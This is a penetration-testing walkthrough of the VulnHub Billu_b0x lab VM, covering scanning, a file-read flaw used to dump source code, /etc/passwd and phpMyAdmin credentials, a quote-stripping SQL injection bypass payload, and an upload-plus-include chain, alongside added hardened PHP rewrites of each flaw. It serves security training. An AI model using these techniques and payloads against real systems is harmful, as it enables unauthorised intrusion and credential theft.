VulnHub Penetration Testing Practice Lab - Billu_b0x
Posted by H3rmesk1t
Environment download
Click here to download the environment
Billu_b0x machine setup
Import the downloaded VM image into VMware and set the network connection of both the target and the attacking machine to NAT mode.
Penetration testing
Information gathering
Run an ARP scan from Kali to discover live hosts:
sudo arp-scan -l
Use Nmap to ping-sweep the NAT /24 range of the VMware Network Adapter VMnet8 interface:
sudo nmap -sP 192.168.23.1/24
Target IP address identified:
192.168.23.130
Run a deeper Nmap scan: sudo nmap -sS -A 192.168.23.130 -oN billu.txt
The target has ports 22 and 80 open.
Vulnerability discovery
Visiting port 80 shows the site's front page with a username and password form and the hint "Show me your SQLI skills".
Approach to finding vulnerabilities:
- SQL injection: the front page hints at injection, so find a way to inject successfully
- Directory brute-forcing: run DirBuster to find new pages and look for new vulnerabilities there
- Vulnerability scanning: feed the discovered pages to AWVS or AppScan
- Manual testing: proxy Firefox through Burp, inspect the Request and Response of each discovered page and look for flaws by hand
- Read the source of every page for hints
- If a username and password turn up, try SSH; a working SSH login makes a reverse shell unnecessary
Start by testing with sqlmap:
sqlmap -u http://192.168.23.130/ --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql
It finds nothing.
Scan the site directories with dirsearch:
python3 dirsearch.py -u 192.168.23.130 -e *.php
Quite a few pages return 200.
Further testing shows that
http://192.168.23.130/test.php
has a file inclusion vulnerability.
Use it to read the PHP files found during the directory scan:
- c.php

```php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
echo "connection failed -> " . mysqli_connect_error();
}
?>
```
- add.php

```php
<?php
echo '<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name=image>
<input type=text name=name value="name">
<input type=text name=address value="address">
<input type=text name=id value=1337 >
<input type="submit" value="upload" name="upload">
</form>';
?>
```
- index.php

```php
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
$_SESSION['logged']='';
}
if($_SESSION['logged']==true && $_SESSION['admin']!='')
{
echo "you are logged in :)";
header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un>   Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "You are allowed<br>";
$_SESSION['logged']=true;
$_SESSION['admin']=$row['username'];
header('Location: panel.php', true, 302);
}
else
{
echo "<script>alert('Try again');</script>";
}
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>
```
- test.php

```php
<?php
function file_download($download)
{
if(file_exists($download))
{
header("Content-Description: File Transfer");
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Accept-Ranges: bytes');
header('Content-Disposition: attachment; filename="'.basename($download).'"');
header('Content-Length: ' . filesize($download));
header('Content-Type: application/octet-stream');
ob_clean();
flush();
readfile ($download);
}
else
{
echo "file not found";
}
}
if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{
echo '\'file\' parameter is empty. Please provide file path in \'file\' parameter ';
}
?>
```
- panel.php

```php
<?php
session_start();
include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
header('Location: index.php', true, 302);
exit();
}
echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
unset($_SESSION['logged']);
unset($_SESSION['admin']);
header('Location: index.php', true, 302);
}
echo '<hr><br>';
echo '<form method=post>
<select name=load>
<option value="show">Show Users</option>
<option value="add">Add User</option>
</select>
 <input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
$dir=getcwd();
$choice=str_replace('./','',$_POST['load']);
if($choice==='add')
{
include($dir.'/'.$choice.'.php');
die();
}
if($choice==='show')
{
include($dir.'/'.$choice.'.php');
die();
}
else
{
include($dir.'/'.$_POST['load']);
}
}
if(isset($_POST['upload']))
{
$name=mysqli_real_escape_string($conn,$_POST['name']);
$address=mysqli_real_escape_string($conn,$_POST['address']);
$id=mysqli_real_escape_string($conn,$_POST['id']);
if(!empty($_FILES['image']['name']))
{
$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
$image=array('jpeg','jpg','gif','png');
if(in_array($r,$image))
{
$finfo = @new finfo(FILEINFO_MIME);
$filetype = @$finfo->file($_FILES['image']['tmp_name']);
if(preg_match('/image\/jpeg/',$filetype ) || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
{
if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
{
echo "Uploaded successfully ";
$update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')';
mysqli_query($conn, $update);
}
}
else
{
echo "<br>i told you dear, only png,jpg and gif file are allowed";
}
}
else
{
echo "<br>only png,jpg and gif file are allowed";
}
}
}
?>
```
- /etc/passwd

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
```
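The root cause of the file read above is that test.php hands whatever arrives in the file parameter straight to file_exists() and readfile(). The following is an added example, not code from the original post or from the Billu_b0x VM: a rewrite of file_download() that only serves files from one fixed directory. DOWNLOAD_DIR is an assumed location (the VM has no such directory), and the self-check at the bottom builds its own temporary directory and sample file so it runs offline from the CLI.

```php
<?php
// Added example, not code from the Billu_b0x VM: test.php's file_download()
// rewritten so that only files inside one fixed directory can be served.
// DOWNLOAD_DIR is an assumption; the VM itself has no such directory.
const DOWNLOAD_DIR = '/var/www/html/downloads';

/**
 * Resolve a user-supplied file name to a canonical path inside $baseDir.
 * Returns null whenever the request must be refused.
 */
function safe_download_path(string $requested, string $baseDir = DOWNLOAD_DIR): ?string
{
    // Accept plain file names only: no separators, no traversal, no NUL bytes.
    if ($requested === '' || $requested === '.' || $requested === '..'
        || strpbrk($requested, '/\\') !== false
        || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                       // allowed directory does not exist
    }
    // realpath() resolves symlinks, so a link pointing outside $baseDir
    // fails the prefix check below instead of being followed.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // resolved outside the directory
    }
    return $full;
}

/** Serve the file or answer 404; never echoes the requested path back. */
function file_download_safe(string $requested): void
{
    $path = safe_download_path($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'file not found';
        return;
    }
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

/** Offline self-check with constructed inputs in a temporary directory. */
function self_check(): bool
{
    $tmp = sys_get_temp_dir() . '/dl_' . bin2hex(random_bytes(4));
    mkdir($tmp);
    file_put_contents($tmp . '/report.txt', 'constructed sample content');
    $ok = safe_download_path('report.txt', $tmp) === realpath($tmp . '/report.txt')
        && safe_download_path('../../etc/passwd', $tmp) === null   // traversal
        && safe_download_path('/etc/passwd', $tmp) === null        // absolute path
        && safe_download_path("report.txt\0.jpg", $tmp) === null  // NUL truncation
        && safe_download_path('missing.txt', $tmp) === null;       // nonexistent file
    unlink($tmp . '/report.txt');
    rmdir($tmp);
    return $ok;
}

if (PHP_SAPI === 'cli') {
    echo self_check() ? "checks passed\n" : "checks FAILED\n";
} elseif (isset($_POST['file'])) {
    file_download_safe((string) $_POST['file']);
} else {
    echo "'file' parameter is empty.";
}
```

The prefix comparison is done on the realpath() result of both the base directory and the candidate, so symlinks inside the download directory cannot be used to escape it, and the 404 branch deliberately does not echo the requested name, which would otherwise turn the endpoint into a probe for which paths exist.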
Reviewing the information gathered so far:
- /etc/passwd contains one account with UID 1000, ica, so the SSH username may be ica or root
- c.php contains the MySQL username billu, the password b0x_billu and the database name ica_lab
Logging in to phpMyAdmin with the MySQL credentials fails at first (the reason is explained below).
After rebuilding the environment and logging in again with the same credentials, the auth table of the ica_lab database holds the web login username biLLu and password hEx_it.
getshell
Getting root
Further directory brute-forcing turns up the phpmy directory. phpMyAdmin's default configuration file is config.inc.php, so the earlier file inclusion vulnerability is used to read it; the file reveals the user root with password roottoor:
```php
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
/* End of servers configuration */
$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>
```
Logging in over SSH with Xshell using these credentials gives a root shell.
As for why MySQL could not be logged into earlier: checking the service showed its state as mysql stop/waiting, so MySQL was presumably knocked over by the earlier high-thread directory brute-forcing and scanning.
Getting a non-root shell
- Method 1: log in to the web page with the account credentials found through phpMyAdmin
- Method 2: audit the index.php source, which contains the following filter:

```php
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
```

str_replace removes every single quote from the input (the PHP literal '\'' is one ' character), so a bare quote never reaches the query. The injection payload must therefore contain the string \': after the quote is stripped, the remaining backslash escapes the closing quote of the SQL string literal, and without it the query simply fails. urldecode decodes the input before the replacement. Using ' or 1=1 -- \' as both the username and the password logs in to the web page successfully.
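Stripping quotes is not a fix for this login, because the backslash is never touched and the query is still assembled by string concatenation. The following is an added example, not code from the original post or from the VM: the index.php login handler rewritten around a prepared statement and password hashing. It assumes that $conn is the mysqli handle opened in c.php and that the auth table has columns uname and pass_hash (the VM's table stores plaintext passwords in a column called pass, so pass_hash is an assumed name).

```php
<?php
// Added example, not code from the Billu_b0x VM: index.php's login rewritten
// with a prepared statement and password hashing. Assumptions: $conn is the
// mysqli handle from c.php, and the auth table has columns uname and
// pass_hash (the VM stores plaintext in a column called pass).
session_start();
include('c.php');

/** Return the matching user name on success, null on failure. */
function authenticate(mysqli $conn, string $uname, string $pass): ?string
{
    // Parameterised query: the value travels separately from the SQL text,
    // so quotes and backslashes in the input cannot change the statement.
    $stmt = $conn->prepare('SELECT uname, pass_hash FROM auth WHERE uname = ? LIMIT 1');
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify against a dummy hash when the user does not exist, so the
    // response time does not reveal which user names are valid.
    static $dummy = null;
    $dummy ??= password_hash('not-a-real-password', PASSWORD_DEFAULT);
    $ok = password_verify($pass, $row['pass_hash'] ?? $dummy);
    return ($row !== null && $ok) ? $row['uname'] : null;
}

/** Hash a password for storage; used when creating or migrating users. */
function make_password_hash(string $pass): string
{
    return password_hash($pass, PASSWORD_DEFAULT);
}

if (isset($_POST['login'])) {
    // No urldecode(): PHP has already decoded the form body once, and a
    // second decode only gives the client a way to smuggle characters past
    // any filtering that runs before it.
    $user = authenticate($conn, (string) ($_POST['un'] ?? ''), (string) ($_POST['ps'] ?? ''));
    if ($user !== null) {
        session_regenerate_id(true);        // new session id on login
        $_SESSION['logged'] = true;
        $_SESSION['admin']  = $user;
        header('Location: panel.php', true, 302);
        exit();                             // stop rendering after the redirect
    }
    echo "<script>alert('Try again');</script>";
}
```

Note that the original handler also continues executing after header('Location: ...') and reads $row['username'] from a table whose column is uname; the rewrite redirects with exit() and takes the user name from the prepared statement's own result.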
Click add user to open the account creation page. This is an image upload point; combining the image upload with the file inclusion yields a shell.
Looking at the panel.php source obtained earlier through the file inclusion, panel.php has a local file inclusion vulnerability: the load value only has "./" removed before it is handed to include(), so any value other than add or show is included as-is.

```php
if(isset($_POST['continue']))
{
$dir=getcwd();
$choice=str_replace('./','',$_POST['load']);
if($choice==='add')
{
include($dir.'/'.$choice.'.php');
die();
}
if($choice==='show')
{
include($dir.'/'.$choice.'.php');
die();
}
else
{
include($dir.'/'.$_POST['load']);
}
}
```
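The two weaknesses that chain together here are the fall-through include() and an upload that keeps the client's file name under the web root. The following is an added example, not code from the original post or from the VM: the include and upload logic of panel.php rewritten so that load can only select one of two fixed pages and an uploaded file is re-encoded and stored under a random name. It assumes $conn from c.php, the GD extension, and an UPLOAD_DIR outside the web root (an assumed path; the VM uses uploaded_images/ inside it).

```php
<?php
// Added example, not code from the Billu_b0x VM: panel.php's include and
// upload handling rewritten. Assumptions: $conn comes from c.php, the GD
// extension is available, and UPLOAD_DIR is a directory Apache does not serve.
include('c.php');
const UPLOAD_DIR = '/var/www/uploads';

/** Map the form choice to a file name; anything else is rejected. */
function resolve_page(string $choice): ?string
{
    $pages = ['show' => 'show.php', 'add' => 'add.php'];
    return $pages[$choice] ?? null;       // strict lookup, no path building
}

/**
 * Validate an upload and return the stored file name, or null.
 * The stored name is random and its extension comes from the detected
 * MIME type, never from the client-supplied file name.
 */
function store_image(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // Decode and re-encode the image: anything the client tucked into
    // comment or metadata sections is dropped when GD writes it back.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    $ext  = $allowed[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    $saved = match ($ext) {
        'jpg' => imagejpeg($img, $dest, 90),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    return $saved ? $name : null;
}

if (isset($_POST['continue'])) {
    $page = resolve_page((string) ($_POST['load'] ?? ''));
    if ($page === null) {
        http_response_code(400);
        die('unknown option');
    }
    include __DIR__ . '/' . $page;
    die();
}

if (isset($_POST['upload'])) {
    $stored = store_image($_FILES['image'] ?? []);
    if ($stored === null) {
        echo '<br>only png, jpg and gif files are allowed';
    } else {
        // Metadata goes in through a prepared statement, not concatenation.
        $name    = (string) ($_POST['name'] ?? '');
        $address = (string) ($_POST['address'] ?? '');
        $id      = (int) ($_POST['id'] ?? 0);
        $stmt = $conn->prepare('INSERT INTO users(name, address, image, id) VALUES (?, ?, ?, ?)');
        $stmt->bind_param('sssi', $name, $address, $stored, $id);
        $stmt->execute();
        $stmt->close();
        echo 'Uploaded successfully';
    }
}
```

With the page name chosen from a fixed array there is no string left for a traversal sequence to land in, and because the stored image lives outside the web root under a name the client never sees, there is no path for the original include() chain to reach even if a future change reintroduced a permissive include.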